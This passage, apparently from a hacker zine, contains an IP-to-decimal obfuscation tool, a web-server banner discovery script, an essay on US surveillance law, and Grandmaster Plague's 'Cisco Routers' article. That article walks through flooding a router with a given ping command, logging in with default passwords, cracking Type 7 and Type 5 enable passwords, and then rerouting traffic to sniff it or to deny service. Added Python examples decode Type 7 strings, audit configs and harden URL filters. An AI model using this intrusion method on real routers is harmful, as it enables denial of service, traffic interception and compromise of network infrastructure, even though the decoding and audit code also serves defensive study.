    }

    hostent *h = NULL;
    char hostname[80];

    cout << "\n\n"
         << "########################################\n"
         << "# Host Name to Decimal Equivalent v1.0 #\n"
         << "# by: ThermoFish (JW)                  #\n"
         << "########################################\n\n";
    cout << "Enter hostname: ";
    cin.getline(hostname, sizeof hostname);   // bounded read; cin >> would overrun the 80 bytes

    h = gethostbyname(hostname);               // DNS lookup, answer in the HOSTENT structure
    if (h == NULL)
    {
        cout << "Could not resolve " << hostname << endl;
        cout << "\n\nPress any key to exit.\n";
        getch();
        WSACleanup();
        return 1;
    }

    // First address of h_addr_list, rendered as a dotted quad
    char *ip = inet_ntoa(*(reinterpret_cast<in_addr*>(h->h_addr)));
    cout << "\nIP address : " << ip << endl;
    IPtoDec(ip);

    cout << "\n\nPress any key to exit.\n";
    getch();
    WSACleanup();
    return 0;
}

// Pack the four octets into one 32-bit value: a<<24 | b<<16 | c<<8 | d
int IPtoDec(char *ip)
{
    using namespace std;
    char *cptr = strtok(ip, ".");
    int shift = 24;
    unsigned long acc = 0L;
    while (cptr != NULL)
    {
        acc += atol(cptr) << shift;
        shift -= 8;
        cptr = strtok(NULL, ".");
    }
    cout << "\nIP as Decimal : " << acc << endl;
    return (0);
}
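As an added example (not ThermoFish's code), here is the same hostname-to-decimal conversion in Python, extended to the other numeric spellings a BSD-style inet_aton() accepts, together with the canonicalisation step a URL filter needs so that none of them slip past it. The DNS lookup is replaced by a constructed table so the code runs offline; swap in socket.gethostbyname() for a real resolver.

```python
"""Hostname-to-decimal URL obfuscation and the canonicalisation a URL filter needs.
Added example, not ThermoFish's program. DNS is stubbed with a constructed table
so it runs offline; use socket.gethostbyname() for real lookups."""
import re

# Constructed sample answers standing in for DNS (not real resolver output).
FAKE_DNS = {
    "www.example.com": "93.184.216.34",
    "localhost": "127.0.0.1",
}

def dotted_to_int(dotted):
    """Same arithmetic as the article's IPtoDec(): shift each octet into place."""
    octets = [int(o) for o in dotted.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError("not a dotted quad: %r" % dotted)
    acc = 0
    for o in octets:
        acc = (acc << 8) | o
    return acc

def hostname_to_decimal(hostname, resolve=FAKE_DNS.get):
    """The article's one-step conversion: hostname -> IP -> 32-bit decimal."""
    ip = resolve(hostname)
    if ip is None:
        raise LookupError("could not resolve %s" % hostname)
    return dotted_to_int(ip)

def obfuscated_forms(dotted):
    """Other spellings a BSD-style inet_aton() accepts for the same address."""
    n = dotted_to_int(dotted)
    a, b, c, d = (int(o) for o in dotted.split("."))
    return {
        "decimal": str(n),
        "hex": "0x%08x" % n,
        "octal": ".".join("0%o" % o for o in (a, b, c, d)),
        "two_part": "%d.%d" % (a, (b << 16) | (c << 8) | d),  # a.bcd: last part fills 24 bits
        "mixed": "%d.0x%02x.%d.0%o" % (a, b, c, d),
    }

_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")

def _parse_part(text):
    """One inet_aton() component: 0x.. is hex, a leading 0 is octal, else decimal."""
    if not _PART.match(text):
        raise ValueError("bad component %r" % text)
    if text[:2].lower() == "0x":
        return int(text[2:], 16)
    if len(text) > 1 and text[0] == "0":
        return int(text, 8)
    return int(text, 10)

def canonical_ipv4(host):
    """Dotted quad for any numeric host inet_aton() would accept, or None when the
    string is not numeric at all (i.e. it is a real hostname)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    # a | a.b | a.b.c | a.b.c.d : leading parts are one octet each, the last part
    # fills whatever of the 32 bits remains.
    widths = [8] * (len(values) - 1) + [32 - 8 * (len(values) - 1)]
    n = 0
    for v, w in zip(values, widths):
        if v >= (1 << w):
            return None
        n = (n << w) | v
    return "%d.%d.%d.%d" % ((n >> 24) & 255, (n >> 16) & 255, (n >> 8) & 255, n & 255)

BLOCKLIST = {"93.184.216.34"}   # constructed: the address the filter is meant to stop

def naive_filter_blocks(host):
    """The string-match filter the article defeats: only the literal spelling is caught."""
    return host in BLOCKLIST

def canonical_filter_blocks(host, resolve=FAKE_DNS.get):
    """Hardened check: normalise numeric forms and resolve names before comparing."""
    ip = canonical_ipv4(host) or resolve(host)
    return ip in BLOCKLIST

if __name__ == "__main__":
    for form, text in obfuscated_forms("93.184.216.34").items():
        print("%-9s %-24s naive=%-5s canonical=%s" % (
            form, text, naive_filter_blocks(text), canonical_filter_blocks(text)))
```

The point for the defender is in canonical_filter_blocks(): a filter that compares the host string literally is beaten by every form obfuscated_forms() produces, while one that reduces the host to a dotted quad first is not. The octal, hex and short-form spellings follow the same parsing rules as the decimal one the article uses, so a filter has to handle all of them, not just the pure-decimal case.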
Cisco Routers
by Grandmaster Plague
Cisco routers are some of the most fascinating machines on the Internet. It is almost assured that if you send a packet to a random machine on the Internet, your packet will pass through a Cisco router. The prevalence of these beauties on the net is mind boggling. But how do you break in? Well, this requires a little explaining first.
Standard Disclaimer: The information in this article is meant for educational purposes only. I do not advocate doing anything mentioned in this article. I also take no responsibility if you do anything mentioned in this article.
Some Background Info First
Cisco routers are great at passing packets from network to network. However, they are shitty at directly receiving packets sent at them. If they could receive packets as well as they could route them, then Cisco would sell an all-in-one super duper Internet server-router gee-whiz-it-does-everything machine. Keep this in mind for the attack that will come later. Now, if you try to telnet to a properly configured Cisco router you will get one of two things. The first is that your connection will be denied (or will time out) based on a firewall ruleset, or because TCP/IP access is not allowed to the router (serial only). Either way, bypassing this first case is beyond the scope of this article. (Hint: combine the info to be learned in this article with my spoofing article in 18:3 for your answer.) The second possible thing is you get a password prompt. If you get this (just a password prompt) you're most likely at a router, and it's on to the rest of the article.
Conceptualizing The Attack
The attack boils down to this. First, you flood the router from one host, causing it to default to a sort of "safe mode" wherein only the barest of routing functions are executed. Ciscos have been made to keep on routing until they can't possibly route anymore. This is why critical system access goes before routing functionality goes. Now, Cisco builds in a little safety net for admins who this happens to by letting them still get access to their system to shut down a router-gone-haywire. So, if the system is overloaded, you can telnet in and enter the default password to get complete enable (root!) access to the router. You then will transmit the router's password file to your machine and crack it. Now you have full enable access and can do whatever you please with the router.
The Attack Itself
The first thing you'll need for this attack is at least one valid socks (or wingate) proxy or a shell on some system - anything to make your access come from another host. I would recommend at least two such hosts to do this. First, you want to initiate a DoS attack that will flood the router, such as a huge password in the password field, or an ICMP flood. For the purposes of this article, we will use a huge ping command (as root on a Linux/BSD box):

ping -s 65535 -f -c 1000000 cisco.host.whatever.net

(Linux ping refuses a payload over 65507 bytes, the most that fits in a single IP datagram, so use that figure there.) Get that started and wait for a bit. Then, after a minute or so, you telnet to cisco.host.whatever.net from a different IP address (another NIC with its own IP address, not one behind the same NAT router, or through a wingate). Now, you get a nice prompt and type the default password in (usually enable or admin... otherwise check www.mksecure.com/defpw/). Now you're logged in with full enable access. We want to keep access and not be noticed, so we find either the encrypted or (if lucky) the unencrypted password. This is usually simple. Start logging your terminal session and type in "sh conf". When you see a line that starts with "enable secret" or "enable password" grab that line. If you only see three arguments to either of these commands, the third argument is the password. Still, if you get the "enable password" line, then be happy, because even if it's encrypted, it's a Cisco Type 7 password (whose encryption has been broken hundreds of times). See http://hackersplayground.org/papers/crack-cisco-passwords.txt for code and explanation on how to break Type 7 passwords. If you're not so lucky, you'll see something like "enable secret 5 $1$..." followed by the hash. That's a salted MD5 (Type 5) password. You can dump it into john the ripper (after some formatting). Let it run for a little while and you'll get a nice password to use to get access to the router. Congratulations, you should have full enable access at this point. Disconnect from the router and stop your ping flood.
What Do I Do Now?
Well, I'd be surprised if people reading this article didn't have ideas of things they can do once they get full enable access on a Cisco router. But, for those of you who don't, I'll give you some ideas. Modify the route tables to go through another machine which can sniff data. TunnelX is the best project I've seen to do this. It was featured in Phrack 56 (http://www.phrack.org/phrack/56/) in the article "Things To Do In Cisco Land When You're Dead" by gauis. That article covers installation of tunnelx. If you realize that a significant bit of traffic goes through routers, you'll realize that you need to set up a script to check the packets you sniff for key terms and discard as they come in, so you don't waste ten gigs of disk space in two minutes. Another fun thing about routers is that they're often connected directly (through serial) to mainframes at NOCs. These machines are super fun to play with and are often otherwise inaccessible to the outside. Ciscos that are the primary router for a network are almost always trusted machines on that internal network. You can get to machines that are not visible to the Internet. DoS is also really easy. Just change the route table of the router to send all packets received to 127.0.0.1. The possibilities are endless.
Conclusion
Cisco routers are some of the most prevalent machines on the Internet. The security of these machines is crucial to the survival of the Internet and corporate networks around the globe. It is often unbelievably easy to get full enable access on a Cisco router with very little work. There are many ways to secure your system. (See Hardening Cisco Routers by Thomas Akin, O'Reilly Books, ISBN 0-596-00166-5 or http://secinf.net/info/fw/cisco/add.html#routing or a host of other sites.) But Cisco has a lot of problems that they need to fix before your router will be secure out of the box. Hopefully this article has moved that along a bit.
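An added example, not the author's or Cisco's code, that covers both the Type 7 recovery described in "The Attack Itself" and the hardening the conclusion points to: it decodes "password 7" strings as they appear in a show running-config, and audits a config for the settings this attack depends on (a reversible or cleartext enable password, no enable secret, vty lines reachable by telnet from anywhere). Both configs are constructed for the example; the Type 5 hashes in the hardened one are placeholders, not real digests.

```python
"""Cisco IOS config audit: decode Type 7 passwords and flag the weak settings the
article relies on. Added example, not Grandmaster Plague's code or anything from
Cisco; both configs below are constructed, not captured from a real router."""
import re

# IOS encodes "password 7" strings by XORing with this fixed key; the first two
# characters of the string are the decimal offset at which the key is started.
_TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUB"

def decode_type7(encoded):
    """Reverse a Type 7 string, e.g. 0822455D0A16 -> 'cisco'."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("malformed Type 7 string: %r" % encoded)
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ _TYPE7_KEY[(seed + i) % len(_TYPE7_KEY)] for i, b in enumerate(data))
    return plain.decode("ascii")

def encode_type7(plain, seed=8):
    """The forward direction, to make the point that this is a keyed XOR, not a hash."""
    data = plain.encode("ascii")
    body = bytes(b ^ _TYPE7_KEY[(seed + i) % len(_TYPE7_KEY)] for i, b in enumerate(data))
    return "%02d%s" % (seed, body.hex().upper())

# "enable password", "username X password" and line "password" statements, with an
# optional type digit: 0/absent = cleartext, 7 = reversible, anything else left alone.
_PASSWORD = re.compile(
    r"^[ \t]*(enable password|username\s+(\S+)\s+password|password)\s+(?:(\d)\s+)?(\S+)",
    re.M)

def audit_config(config):
    """Findings from a 'show running-config' text, as a list of strings."""
    findings = []
    if re.search(r"^enable secret\s+5\s+\$1\$", config, re.M) is None:
        findings.append("no 'enable secret' (Type 5, salted MD5); enable mode relies on 'enable password'")
    for m in _PASSWORD.finditer(config):
        stmt, user, ptype, value = m.groups()
        who = "enable" if stmt.startswith("enable") else ("user %s" % user if user else "line")
        if ptype == "7":
            findings.append("%s: Type 7 password decodes to %r" % (who, decode_type7(value)))
        elif ptype in (None, "0"):
            findings.append("%s: cleartext password %r" % (who, value))
    # Each "line vty" block: is it reachable from anywhere, and is it telnet at all?
    for block in re.findall(r"^line vty.*?(?=^line |^!|\Z)", config, re.M | re.S):
        if "access-class" not in block:
            findings.append("vty: no access-class, management reachable from any source")
        if "transport input ssh" not in block:
            findings.append("vty: telnet accepted, credentials cross the wire in clear")
    return findings

# Constructed "sh run" excerpts (the $1$ values are placeholders, not real digests).
WEAK_CONFIG = """\
!
hostname weak-router
enable password 7 0822455D0A16
username admin password 7 094F471A1A0A
!
line vty 0 4
 password 7 0822455D0A16
 login
!
"""

HARDENED_CONFIG = """\
!
hostname hard-router
service password-encryption
enable secret 5 $1$salt$placeholderhash0000000000
username admin secret 5 $1$salt$placeholderhash0000000001
!
access-list 10 permit 10.0.0.0 0.0.0.255
!
line vty 0 4
 access-class 10 in
 transport input ssh
 login local
!
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print("%s: %s" % (name, audit_config(cfg) or ["no findings"]))
```

Two caveats before relying on a decoded Type 7 string: when both enable secret and enable password are configured, IOS uses the secret for enable mode, so the decoded enable password is only as useful as the admin's habit of reusing it; and service password-encryption applies the Type 7 scheme only to password statements, never to secret ones, so its presence says nothing about the strength of the enable secret.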
A New Era of Surveillance
by The Prophet
As the satellite republics of the Soviet Union fell at the end of the 20th century, the Western world was shocked at the surveillance societies erected by their authoritarian governments. From a population of 17 million in East Germany, the dreaded Stasi secret police employed 34,000 officers, including 2100 agents reading mail and 6000 operatives listening to private telephone conversations. Additionally, over 150,000 active informers and up to two million part-time informers were on the payroll. Files were maintained by the Stasi on more than one out of three East Germans, comprising over a billion pages of information.
While centralized domestic surveillance in the United States has probably not yet reached the levels seen in East Germany, the picture is very different when government databases are linked - and especially when government databases are linked with commercial ones. To help it fight the insane "war on [some] drugs," the federal government has already connected the databases of the Customs Service, the Drug Enforcement Administration, the IRS, the Federal Reserve, and the State Department. These are accessible via FinCEN and other law enforcement networks (and probably via classified intelligence networks as well - but sorry, that's classified). Additionally, the United States has relatively few data protection laws (particularly concerning the collection of data for commercial purposes), meaning the extensive use of computer matching has led to a "virtual" national data bank. With only a few computer searches, and without obtaining a search warrant, law enforcement can gather a comprehensive file on virtually any US citizen in a matter of minutes.
Telecommunications, unlike paper and electronic records, enjoyed much stronger privacy protections - until September 11th. Americans have the egregious wiretapping abuses of J. Edgar Hoover's FBI to thank for this. However, long before September 11th, the FBI was laying the groundwork to turn the US telecommunications system into a surveillance infrastructure. This began in 1994 when, at the strong urging of former FBI Director Louis Freeh, Congress passed the Communications Assistance for Law Enforcement Act (CALEA, pronounced "Kuh-LEE-uh" for short).
The legal reasoning behind CALEA is fairly recent and, to fully understand it, it should be considered in light of the failed Clipper Chip key escrow initiatives of the early 1990s. During the consideration of key escrow legislation (which ultimately failed) and CALEA (which was ultimately successful), the FBI nearly convinced Congress that Americans have no legal or moral right to keep any secrets from the government. Fortunately, Congress was not fooled - they decided that while Americans should be subject to surveillance of all of their communications, citizens could still keep secrets from the government. How magnanimous of them!
The stated purpose of CALEA is to preserve, despite advances in technology, the surveillance capabilities law enforcement agencies possessed in 1994. The actual implementation of CALEA, predictably, has been much more broad than Congress originally contemplated.
Technically, the FCC is tasked with determining the surveillance capabilities telecommunications carriers are required to provide. Because surveillance is not the core competency of the FCC, they have deferred to the FBI's expertise, and serve as a "rubber stamp" for the technical requirements the FBI requests. Privacy groups have widely criticized the resultant 11-point "punch list," with which telecommunications carriers must comply, as a dramatic expansion of the capabilities originally contemplated by CALEA. For example, mobile telephones containing GPS locators have recently appeared on the market. Touted as a safety feature, GPS is also a surveillance feature mandated by CALEA. If you carry such a phone, the FBI knows exactly where you are at all times. (Of course, J. Edgar Hoover's FBI will only use that capability against criminals and terrorists, right?)
Other technical requirements on the "punch list" include the capability to intercept all packet-switched communications, which includes Internet traffic. The FBI presents this in seemingly reasonable terms - they just want to tap Voice Over IP (VoIP) and other packet-mode voice communications like any other telephone call. Of course, to those familiar with TCP/IP, this is very frightening indeed; the only way to intercept the "bad guy's" data is to look at everyone's data. On the Internet, this is accomplished with DCS1000 (formerly Carnivore) and other proprietary surveillance devices. The FBI really likes to keep secrets, so they won't reveal a complete list of the surveillance devices they use, won't reveal the manufacturers, and won't release a full list of surveillance capabilities. In the face of intense Congressional pressure, the FBI reluctantly allowed one "independent technical review" of the nearly obsolete Carnivore system. However, this was conducted on such restrictive terms that MIT, Purdue, Dartmouth, and UCSD refused to participate on the grounds the study was rigged. Jeffrey Schiller, when explaining MIT's refusal to CNN, said, "In essence, the Justice Department is looking to borrow our reputation, and we're not for sale that way."

Eventually a research team at the obscure Illinois Institute of Technology Research Institute was selected to perform the study. While the FBI intended to keep the identities of the "independent researchers" a secret, they accidentally leaked the researchers' names on an incorrectly formatted Adobe PDF document. So much for secrets. As it turned out, three of the supposedly "independent" team members possessed active security clearances (including top secret NSA and IRS clearance - go figure), and two others had close ties to the White House. With the deck so carefully stacked in the FBI's favor, it is surprising (and telling) the IITRI study warned Carnivore "does not provide protections, especially audit functions, commensurate with the level of the risks," and was vulnerable to "physical attacks, software bugs or power failures." The ACLU offered to perform its own review of Carnivore, but the FBI not-so-politely declined.

In the interim, the next release of Carnivore, called DCS1000, is now in operation. As with Carnivore, the capabilities of DCS1000 are not fully disclosed. Mysteriously, many Internet Service Providers (ISPs), including Comcast and Sprint, have implemented so-called "transparent proxy" servers, possessing extensive logging capabilities. Comcast, in a widely-publicized incident which even drew the ire of US Representative (and hacker foe) Ed Markey, was caught associating the web browsing habits of its customers with their IP addresses. While Comcast claims they no longer collect this information, it is likely that other ISPs have implemented similar technology - and equally likely that Comcast could resume logging at the FBI's request.

While telecommunications providers are wary of providing the FBI with direct access to their infrastructure, most do not object out of privacy considerations. Instead, they are primarily concerned that the FBI's activities do not cause disruptions in service. Telecommunications carriers are particularly indignant at court rulings requiring they provide the FBI with direct access to telephone switches, and grant them the ability to install their own software upon the switches. Lucent implemented this capability on the 5ESS switch in the 5E14 software revision, which nearly every 5ESS in the country now runs. Surveillance capabilities have also been present for some time on the Nortel DMS-100 platform. While the capabilities of the FBI's switch software are, like DCS1000, presently unknown, the 5E14 software revision incorporates a number of useful surveillance features on its own. For example, when a surveillance target makes a phone call, the switch can silently conference in a pre-programmed telephone number. Because the FBI also keeps secrets from telecommunications providers, even refusing to share basic architectural information, providers are skeptical of the FBI's assurances that no potential for disruption exists. Additionally, because most surveillance capabilities are provided by the FBI's own software, telecommunications providers cannot audit court-ordered wiretaps. (Of course, J. Edgar Hoover's FBI is trustworthy, so checks and balances are not necessary.)
The cost of implementing surveillance capabilities is also of major concern to telecommunications providers. In exchange for retrofitting the nation's telecommunications infrastructure with a surveillance architecture of which Stalin could only dream (at one point in the CALEA legislative process, the FBI proposed implementing the capability to simultaneously intercept and record one out of every 100 telephone conversations taking place in each central office), the federal government promised $500 million to telecommunications carriers. However, implementing all of the requirements on the CALEA "punch list" is estimated to cost the cash-strapped telecommunications industry as much as $607 million. With the additional "roving wiretap" capabilities granted to the FBI after September 11th in the obliquely named USA Patriot Act, the cost of implementation is likely to soar even higher.
Americans face a new, and potentially dangerous, era of surveillance. History has proven through the nuclear arms race, the Nixon administration, and other similar craziness that things which are possible are not necessarily a good idea. Surveillance societies have appeared in the not so recent past, and they were frightening indeed. Stalin's Russia. Ceausescu's Romania. Honecker's East Germany. Perhaps the United States can avoid the mistakes made by the surveillance societies of the 20th century. And perhaps J. Edgar Hoover's FBI is also completely honest, professional, and incorruptible - just like Robert Hanssen.
Web Server Discovery Tool
By Boris Loza
This project started when I decided to find all the web servers on my network. One can do this by running nmap to identify all open HTTP/S related ports: 80, 8000, 8080, or 443. But nmap is known for crashing servers (just a couple of misbehaviors to mention: killing syslogd on Solaris, Cisco DoS, etc.). Therefore it is not allowed in some organizations. Moreover, even if the ports in question are open, nmap doesn't give you the type and the version of the web server listening on it. Nmap can also trigger the IDS and page the information security group! Using commercial tools like ISS Network Scanner or CyberCop to find all web servers on the network is cumbersome, time consuming, and IDS detectable.
Taking all this into consideration I decided to write my own tool for discovering all web servers on the network. I wanted this tool to be easy to run, not to use "crafted" TCP packets, be efficient, quick, and provide as much information about discovered web servers as possible. We intended to run this tool periodically, like a war dialer, and to do this even during business hours (before users shut down their workstations to go home). I wanted to create a tool as efficient as possible with minimum network and server impact. In this article you'll see what I eventually came up with.
The Tool
First, let's understand a little bit about how a web server and a browser communicate. The browser or client generates request headers and sends them to the web server. The server receives the request headers, translates them, and generates the response headers. These response headers have to include information specific for the web server that will allow both the browser and the server to communicate. I decided to use this information to create the tool.
In the heart of the tool is the following Perl code:
1. use HTTP::Response;                                      #Encapsulate HTTP responses
2. use LWP::UserAgent;                                      #Dispatch WWW requests
3. my $ua = new LWP::UserAgent;                             #User agent object created
4. $ua->agent('Mozilla/5.0');                               #Using Mozilla/5.0 as agent's name
5. my $req = new HTTP::Request(GET, "http://$ARGV[0]");     #Encapsulate a request using GET method
6. print $headers = $ua->request($req)->headers_as_string;  #Read response from the web server
I use Perl's libwww-perl library for WWW access (rows 1 and 2). This library will provide the API for writing my own WWW clients.

First I need to create a request header (rows 3 and 4) by specifying the name of the web browser the request comes from. Now I can send the request to the server using the GET method (row 5). Strictly speaking, I can use any agent's name here, for example agent('Foo'). This doesn't matter, since I need just one response from the server and I am not going to continue the session. Now I can print everything that comes from the server (row 6). After naming this little script as ws.pl and running it against one known web server I've got the following output:
C:\>ws.pl 192.168.0.40
Date: Thu, 04 Apr 2002 15:27:06 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/4.0
Content-Length: 56
Content-Location: http://192.168.0.40/Default.htm
Content-Type: text/html
ETag: "f82f8972cf9ac01:5ee8"
Last-Modified: Mon, 19 Feb 2001 23:55:33 GMT
Client-Date: Thu, 04 Apr 2002 15:28:43 GMT
Client-Peer: 192.168.0.40:80
X-Meta-Postinfo: /scripts/postinfo.asp
As I expected, the web server strikes back by sending all necessary information that will be needed for the session. If no HTTP web server is listening on port 80 the output will be:

C:\>ws.pl 10.56.53.27
Client-Date: Thu, 04 Apr 2002 18:38:39 GMT

In this article I am not going to explain all response headers from the output. For anybody who is interested, please refer to RFC 2616. For the purpose of the script, I am interested only in one: Server: Microsoft-IIS/4.0. This is the name of the web server I connected to. So I can modify line 6 of the script to display only this response header:

print $headers = $ua->request($req)->header('Server');

C:\>ws.pl 192.168.0.40
192.168.0.40 Microsoft-IIS/4.0
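As an added example that is not Boris Loza's ws.pl, here is the same Server-header probe in Python with the two pieces the article's tool builds toward: a check of one host, and a threaded sweep of a whole network. A throwaway local HTTP server that answers with the IIS 4.0 banner from the sample output is started inside the file, so the probe can be exercised offline against a constructed target; nothing here touches a real host unless you pass one to probe() or sweep().

```python
"""Web server discovery by the Server response header. Added example, not Boris
Loza's ws.pl. Standard library only; a throwaway loopback HTTP server is started
so the probe can be run offline against a constructed target."""
import http.client
import ipaddress
import socket
import threading
from concurrent.futures import ThreadPoolExecutor
from http.server import BaseHTTPRequestHandler, HTTPServer

def probe(host, port=80, timeout=2.0):
    """Return the Server header of host:port ('' if the server sends none), or None
    if nothing spoke HTTP there. HEAD is used so no body is transferred."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("HEAD", "/", headers={"User-Agent": "Mozilla/5.0"})
        return conn.getresponse().getheader("Server", "").strip()
    except (OSError, http.client.HTTPException):
        return None
    finally:
        conn.close()

def sweep(network, port=80, workers=64, timeout=1.0):
    """Probe every host of an IPv4 network such as '192.168.0.0/24'; {ip: Server}."""
    hosts = [str(ip) for ip in ipaddress.ip_network(network, strict=False).hosts()]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda h: probe(h, port, timeout), hosts)
        return {ip: s for ip, s in zip(hosts, results) if s is not None}

# --- constructed target so the example runs offline (not a real host) -----------
class _FakeIIS(BaseHTTPRequestHandler):
    """Answers like the IIS 4.0 host in the article's sample output."""
    def version_string(self):
        return "Microsoft-IIS/4.0"
    def do_HEAD(self):
        self.send_response(200)
        self.end_headers()
    do_GET = do_HEAD
    def log_message(self, *args):
        pass

def start_target():
    """Bind the fake server to an ephemeral loopback port; return (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), _FakeIIS)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]

def free_port():
    """An ephemeral port with nothing listening, to show the negative case."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]

def demo():
    """Probe the fake IIS and a closed port; return (banner, closed_result)."""
    srv, port = start_target()
    try:
        return probe("127.0.0.1", port), probe("127.0.0.1", free_port())
    finally:
        srv.shutdown()
        srv.server_close()

if __name__ == "__main__":
    print(demo())
```

HEAD rather than GET avoids pulling a body from every host, and a short timeout keeps a /24 sweep to seconds rather than minutes. Treat the banner as a hint only: Server headers are trivially rewritten, and a proxy or load balancer in front of the box reports its own name rather than the origin's.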
After understanding the concept, I started working on something more useful. Below is a listing of the complete tool. This tool will discover a single web server or all web servers on a given subnet. The default port to scan is 80, but you can specify any port you wish:
#Web Server Discovery Tool. Boris Loza, 2002
use HTTP::Response;
use LWP::UserAgent;
use Getopt::Std;
$usage="Use:\tws.pl [-v] [-p port] hostname     { OR }
\tws.pl [-p port] -C IPaddress        { OR }
\tws.pl -h  {To print this}
Discover Web Servers.
Hostname can be specified by an IP address or a DNS name.
Options:
-v : verbose
-p : specify a port (default 80)
-C : scan class C subnet
Example: ws.pl -v 192.168.10.3         { OR }
         ws.pl myhost.com              { OR }
         ws.pl -p 8000 myhost.com      { OR }
         ws.pl -C 192.168.0            { OR }
         ws.pl -p 8000 -C 192.168.0";

getopts('C:hp:v') || die "$usage";
print "$usage" if $opt_h;
my $port=80; #Default port to scan
if ($opt_p) { $port = $opt_p; }
my $host = $ARGV[0];
#Create Request headers
my $ua = new LWP::UserAgent;
$ua->agent('Foo');
#Send Request headers
my $req = new HTTP::Request(GET, "http://$host:$port");
my $response = $ua->request($req);
#Use verbose mode. For single host only!
if ($opt_v) {